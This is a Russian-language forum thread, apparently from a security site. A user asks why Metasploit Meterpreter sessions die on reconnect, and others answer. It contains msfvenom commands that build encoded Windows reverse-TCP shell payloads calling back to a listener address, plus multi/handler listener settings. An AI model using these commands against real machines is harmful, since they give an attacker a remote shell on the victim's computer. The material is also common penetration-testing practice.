Toggle sidebar
  • Твой профиль заполнен на 0%. Заполни за 1 минуту, чтобы тебя нашли единомышленники и работодатели. Заполнить →

Проблема Meterpreter session 8 closed. Reason: Died

E

edward876

Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад (
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe

), закидаю файл на машину, запускаю файл, и мне прилетает сессия. Но если я закрою метасплоит намерено или случайно, когда я запускаю все так же у меня сессия конектиться и моментально дохнет. На машине какую атакую процесс запускается на пару секунд и умирает. АВ нету, машина пингуется. Помогите найти причину.

1536260520424.png
 
Последнее редактирование модератором:
закинь файл не tmp
 
стань рутом в системе
 
добрый день. скиньте скрин как вы конфигурировали листенер.
 
kot-gor сказал(а):
добрый день. скиньте скрин как вы конфигурировали листенер.
Нажмите, чтобы раскрыть...

скрином не могу, вот как я настраивал листенер


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip.server
set lport 443
run
 
edward876 сказал(а):
скрином не могу, вот как я настраивал листенер


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip.server
set lport 443
run
Нажмите, чтобы раскрыть...
Пробовал запускать на другой машине ?
Попробуй создать пейлоад таким макаром и отпишись по итогам.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > ~/Payload.exe
 
добавьте в конфигурацию следующую строчку

set ExitOnSession false

и место run используйте exploit -j

так же попробуйте SessionCommunicationTimeout значения равное нулю.


вообще более подробно можете прочитать здесь:
Ссылка скрыта от гостей
 
  • Нравится
Реакции: Дрюня Кот, sever0ever, Vertigo и ещё 1 человек
edward876 сказал(а):
скрином не могу, вот как я настраивал листенер


use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ip.server
set lport 443
run
Нажмите, чтобы раскрыть...
Для, начала приведи к общему значению пэйлоад в листенере(windows/x64/meterpreter/reverse_tcp) и при создании полезной нагрузки( windows/x64/shell/reverse_tcp ). Затем добавь в конфигурацию листенера set ExitOnSession false, exploit -j вместо run(товарищ kot-gor выше об этом написал). И, наконец, поэксперементируй с созданием пэйлоада.
 
  • Нравится
Реакции: kot-gor
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

xzotique
  • Статья Статья
Статья PowerShell для Red Team: Скрипты для обхода антивирусов и пост-эксплуатации (LOTL)
Ответы
0
Просмотры
1 тыс.
Общение и нетворкинг
xzotique
xzotique
Сергей Попов
  • Статья Статья
Статья Пентест с нуля: полное практическое руководство для начинающих в 2025
Ответы
0
Просмотры
17 тыс.
Codeby School: курсы и сертификации
Сергей Попов
Сергей Попов
I
  • Вопрос Вопрос
meterpreter не переподключается
Ответы
5
Просмотры
3 тыс.
Вопросы и Ответы по ИБ (Q&A)
ilqar200
I
User17
Статья Metasploit. Учимся вместе полезным фишкам.
Ответы
13
Просмотры
14 тыс.
Мобильная безопасность
delifer
delifer
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab

Верх Низ
Назад